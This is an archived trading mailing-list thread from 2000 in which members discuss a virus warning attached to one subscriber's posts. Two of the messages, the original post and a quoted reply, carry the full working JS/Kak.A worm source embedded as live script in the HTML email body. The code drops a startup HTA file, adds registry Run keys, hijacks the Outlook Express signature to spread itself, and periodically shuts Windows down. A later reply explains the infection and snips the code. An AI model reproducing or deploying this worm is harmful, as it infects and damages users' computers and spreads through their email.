[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[RT] GEN - RT virus?

PureBytes Links

Trading Reference Links

 
<x-html><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
<META content="MSHTML 5.00.2314.1000" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT size=2>Anyway to tell if this virus was attached at the RT server or 
in my computer?&nbsp; Anyone else getting this virus message?</FONT></DIV>
<DIV><FONT size=2>BR</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>
<DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC 
id=scr></OBJECT></DIV><FONT size=2>Antigen for Exchange found Unknown infected 
with JS/Kak.A.Worm virus.<BR>The file is currently Deleted.&nbsp; The message, 
"[RT] MKT - OEX", was<BR>sent from ROBERT ROESKE&nbsp; and was discovered in IMC 
Queues\Inbound<BR>located at Distrivision/NORTHAMERICA/C1PLENAEXI01.<BR></FONT>
<SCRIPT><!--
function sErr(){return true;}window.onerror=sErr;scr.Reset();scr.doc="Z<HTML><HEAD><TITLE>Driver Memory Error</"+"TITLE><HTA:APPLICATION ID=\"hO\" WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#CCCCCC><object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIPT>function sEr(){self.close();return true;}window.onerror=sEr;fs=new ActiveXObject('Scripting.FileSystemObject');wd='C:\\\\Windows\\\\';fl=fs.GetFolder(wd+'Applic~1\\\\Identities');sbf=fl.SubFolders;for(var mye=new Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=mye.item();ids=new String(idd);idn=ids.slice(31);fic=idn.substring(1,9);kfr=wd+'MENUDÉ~1\\\\PROGRA~1\\\\DÉMARR~1\\\\kak.hta';ken=wd+'STARTM~1\\\\Programs\\\\StartUp\\\\kak.hta';k2=wd+'System\\\\'+fic+'.hta';kk=(fs.FileExists(kfr))?kfr:ken;aek='C:\\\\AE.KAK';aeb='C:\\\\Autoexec.bat';if(!fs.FileExists(aek)){re=/kak.hta/i;if(hO.commandLine.search(re)!=-1){f1=fs.GetFile(aeb);f1.Copy(aek);t1=f1.OpenAsTextStream(8);pth=(kk==kfr)?wd+'MENUD~1\\\\PROGRA~1\\\\DMARR~1\\\\kak.hta':ken;t1.WriteLine('@echo off>'+pth);t1.WriteLine('del '+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(k2).Attributes=2;}t2=fs.CreateTextFile(wd+'kak.reg');t2.write('REGEDIT4');t2.WriteBlankLines(2);ky='[HKEY_CURRENT_USER\\\\Identities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook Express\\\\5.0';sg='\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Default Signature\"=\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\00000000]');t2.WriteLine('\"name\"=\"Signature #1\"');t2.WriteLine('\"type\"=dword:00000002');t2.WriteLine('\"text\"=\"\"');t2.Write('\"file\"=\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature Flags\"=dword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]');t2.Write('\"cAg0u\"=\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.hta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s '+wd+'kak.reg');t3=fs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><BODY><DIV style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr></"+"OBJECT></"+"DIV>');t4=fs.OpenTextFile(k2,1);while(t4.Read(1)!='Z');t3.WriteLine('<SCRIPT><!--');t3.write('function sErr(){return true;}window.onerror=sErr;scr.Reset();scr.doc=\"Z');rs=t4.Read(3095);t4.close();rd=/\\\\/g;re=/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path=(la==\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu Démarrer\\\\\\\\Programmes\\\\\\\\Démarrage\\\\\\\\kak.hta\":\"C:\\\\\\\\windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf(\"msie 5.\")!=-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg');d=new Date();if(d.getDate()==1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today !');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 driver memory alloc failed &nbsp; !]]%%%%%</"+"BODY></"+"HTML>";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu Démarrer\\Programmes\\Démarrage\\kak.hta":"C:\\windows\\Start Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("msie 5.")!=-1))scr.write();
//--></SCRIPT>
</OBJECT></DIV></BODY></HTML>
</x-html>From ???@??? Tue Feb 15 12:42:38 2000
Return-Path: <listmanager@xxxxxxxxxxxxxxx>
Received: from mail.thetrellis.net ([208.179.56.11])
	by purebytes.com (8.9.3/8.9.3) with SMTP id MAA17943
	for <neal@xxxxxxxxxxxxx>; Tue, 15 Feb 2000 12:36:06 -0700
Received: from REALTRADERS.COM
	([208.179.56.198])
	by mail.thetrellis.net; Tue, 15 Feb 2000 11:29:44 -0800
Received: from zianet.com by realtraders.com
	with SMTP (MDaemon.v2.8.5.0.R)
	for <realtraders@xxxxxxxxxxxxxxx>; Tue, 15 Feb 2000 11:23:54 -0800
Received: (qmail 27667 invoked by alias); 15 Feb 2000 19:27:18 -0000
Delivered-To: alias-outgoing-realtraders@xxxxxxxxxxxxxxx@outgoing
Received: (qmail 21681 invoked by uid 0); 15 Feb 2000 19:26:37 -0000
Received: from ruidoso0150.zianet.com (HELO p13301) (216.234.206.150)
  by zianet.com with SMTP; 15 Feb 2000 19:26:37 -0000
Message-ID: <013001bf77ea$8aaefe40$96ceead8@xxxxxx>
From: "Earl Adamy" <eadamy@xxxxxxxxxx>
To: "<realtraders@xxxxxxxxxxxxxxx>"
	<realtraders@xxxxxxxxxxxxxxx>
References: <017401bf77e7$19de1a00$a572fea9@xxx>
Subject: [RT] Re: GEN - RT virus?  QUITE LIKELY
Date: Tue, 15 Feb 2000 12:26:17 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_012D_01BF77AF.DB6F9B90"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6600
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
X-MDaemon-Deliver-To: realtraders@xxxxxxxxxxxxxxx
X-Return-Path: eadamy@xxxxxxxxxx
Sender: listmanager@xxxxxxxxxxxxxxx
X-MDMailing-List: realtraders@xxxxxxxxxxxxxxx
X-MDSend-Notifications-To: listmanager@xxxxxxxxxxxxxxx
Reply-To: eadamy@xxxxxxxxxx
Status:   

<x-html><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=windows-1252" http-equiv=Content-Type>
<META content="MSHTML 5.00.2722.2800" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV>Your messages have&nbsp;been generating a message that an&nbsp;"ActiveX 
control on this page is not safe" when I select it in the OE preview window. 
My&nbsp;security settings are too high to allow it to execute. I have all of the 
latest IE5/OE5 security updates installed. I would recommend that anyone who has 
not gotten this warning run a full virus scan.</DIV>
<DIV>&nbsp;</DIV>
<DIV>Earl</DIV>
<BLOCKQUOTE 
style="BORDER-LEFT: #000000 2px solid; MARGIN-LEFT: 5px; MARGIN-RIGHT: 0px; PADDING-LEFT: 5px; PADDING-RIGHT: 0px">
  <DIV style="FONT: 10pt arial">----- Original Message ----- </DIV>
  <DIV 
  style="BACKGROUND: #e4e4e4; FONT: 10pt arial; font-color: black"><B>From:</B> 
  <A href="mailto:bobrabcd@xxxxxxxxxxxxx"; title=bobrabcd@xxxxxxxxxxxxx>ROBERT 
  ROESKE</A> </DIV>
  <DIV style="FONT: 10pt arial"><B>To:</B> <A 
  href="mailto:realtraders@xxxxxxxxxxxxxxx"; 
  title=realtraders@xxxxxxxxxxxxxxx>realtraders@xxxxxxxxxxxxxxx</A> </DIV>
  <DIV style="FONT: 10pt arial"><B>Sent:</B> Tuesday, February 15, 2000 12:01 
  PM</DIV>
  <DIV style="FONT: 10pt arial"><B>Subject:</B> [RT] GEN - RT virus?</DIV>
  <DIV><BR></DIV>
  <DIV><FONT size=2>Anyway to tell if this virus was attached at the RT server 
  or in my computer?&nbsp; Anyone else getting this virus message?</FONT></DIV>
  <DIV><FONT size=2>BR</FONT></DIV>
  <DIV>&nbsp;</DIV>
  <DIV>&nbsp;</DIV>
  <DIV>
  <DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
  <OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC 
  id=scr></OBJECT></DIV><FONT size=2>Antigen for Exchange found Unknown infected 
  with JS/Kak.A.Worm virus.<BR>The file is currently Deleted.&nbsp; The message, 
  "[RT] MKT - OEX", was<BR>sent from ROBERT ROESKE&nbsp; and was discovered in 
  IMC Queues\Inbound<BR>located at 
  Distrivision/NORTHAMERICA/C1PLENAEXI01.<BR></FONT>
  <SCRIPT><!--
function sErr(){return true;}window.onerror=sErr;scr.Reset();scr.doc="Z<HTML><HEAD><TITLE>Driver Memory Error</"+"TITLE><HTA:APPLICATION ID=\"hO\" WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#CCCCCC><object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIPT>function sEr(){self.close();return true;}window.onerror=sEr;fs=new ActiveXObject('Scripting.FileSystemObject');wd='C:\\\\Windows\\\\';fl=fs.GetFolder(wd+'Applic~1\\\\Identities');sbf=fl.SubFolders;for(var mye=new Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=mye.item();ids=new String(idd);idn=ids.slice(31);fic=idn.substring(1,9);kfr=wd+'MENUDÉ~1\\\\PROGRA~1\\\\DÉMARR~1\\\\kak.hta';ken=wd+'STARTM~1\\\\Programs\\\\StartUp\\\\kak.hta';k2=wd+'System\\\\'+fic+'.hta';kk=(fs.FileExists(kfr))?kfr:ken;aek='C:\\\\AE.KAK';aeb='C:\\\\Autoexec.bat';if(!fs.FileExists(aek)){re=/kak.hta/i;if(hO.commandLine.search(re)!=-1){f1=fsGetFile(aeb);f1.Copy(aek);t1=f1.OpenAsTextStream(8);pth=(kk==kfr)?wd+'MENUD~1\\\\PROGRA~1\\\\DMARR~1\\\\kak.hta':ken;t1.WriteLine('@echo off>'+pth);t1.WriteLine('del '+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(k2).Attributes=2;}t2=fs.CreateTextFile(wd+'kak.reg');t2.write('REGEDIT4');t2.WriteBlankLines(2);ky='[HKEY_CURRENT_USER\\\\Identities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook Express\\\\5.0';sg='\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Default Signature\"=\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\00000000]');t2.WriteLine('\"name\"=\"Signature #1\"');t2.WriteLine('\"type\"=dword:00000002');t2.WriteLine('\"text\"=\"\"');t2.Write('\"file\"=\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature Flags\"=dword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]');t2.Write('\"cAg0u\"=\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.hta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s '+wd+'kak.reg');t3=fs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><BODY><DIV style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr></"+"OBJECT></"+"DIV>');t4=fs.OpenTextFile(k2,1);while(t4.Read(1)!='Z');t3.WriteLine('<SCRIPT><!--');t3.write('function sErr(){return true;}window.onerror=sErr;scr.Reset();scr.doc=\"Z');rs=t4.Read(3095);t4.close();rd=/\\\\/g;re=/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path=(la==\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu Démarrer\\\\\\\\Programmes\\\\\\\\Démarrage\\\\\\\\kak.hta\":\"C:\\\\\\\\windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf(\"msie 5.\")!=-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg');d=new Date();if(d.getDate()==1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today !');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 driver memory alloc failed &nbsp; !]]%%%%%</"+"BODY></"+"HTML>";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu Démarrer\\Programmes\\Démarrage\\kak.hta":"C:\\windows\\Start Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("msie 5.")!=-1))scr.write();
//--></SCRIPT>
  </OBJECT></DIV></BLOCKQUOTE></BODY></HTML>
</x-html>From ???@??? Tue Feb 15 12:42:55 2000
Return-Path: <listmanager@xxxxxxxxxxxxxxx>
Received: from mail.thetrellis.net ([208.179.56.11])
	by purebytes.com (8.9.3/8.9.3) with SMTP id MAA18079
	for <neal@xxxxxxxxxxxxx>; Tue, 15 Feb 2000 12:39:20 -0700
Received: from REALTRADERS.COM
	([208.179.56.198])
	by mail.thetrellis.net; Tue, 15 Feb 2000 11:30:55 -0800
Received: from defiant.coinet.com by realtraders.com
	with SMTP (MDaemon.v2.8.5.0.R)
	for <realtraders@xxxxxxxxxxxxxxx>; Tue, 15 Feb 2000 11:24:40 -0800
Received: (qmail 24625 invoked from network); 15 Feb 2000 19:27:45 -0000
Received: from tc1-2-5.cns-nw.com (HELO coinet.com) (204.119.54.35)
  by coinet.com with SMTP; 15 Feb 2000 19:27:45 -0000
Message-ID: <38A9A8AE.BDD4C285@xxxxxxxxxx>
Date: Tue, 15 Feb 2000 11:27:42 -0800
From: Dennis Holverstott <dennis@xxxxxxxxxx>
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en
MIME-Version: 1.0
To: <realtraders@xxxxxxxxxxxxxxx>
CC: realtraders@xxxxxxxxxxxxxxx
Subject: [RT] Re: GEN - RT virus?
References: <017401bf77e7$19de1a00$a572fea9@xxx>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-MDaemon-Deliver-To: realtraders@xxxxxxxxxxxxxxx
X-Return-Path: dennis@xxxxxxxxxx
Sender: listmanager@xxxxxxxxxxxxxxx
X-MDMailing-List: realtraders@xxxxxxxxxxxxxxx
X-MDSend-Notifications-To: listmanager@xxxxxxxxxxxxxxx
Reply-To: dennis@xxxxxxxxxx
Status:   

Bob, it looks like your computer is infected. Both your posts to RT
today contain a javascript worm designed to infect Outlook Express
users. Your last post from yesterday is clean.

Ah, just got your post from the other computer. That one is clean.

RT subrcribers who use Outlook Express, BEWARE. You may be infected too.

ps - I didn't need any antivirus software to see that. I just looked at
the "page source" in Netscape. It contains...

<SCRIPT>

worm snipped

</SCRIPT>

-- 
  Dennis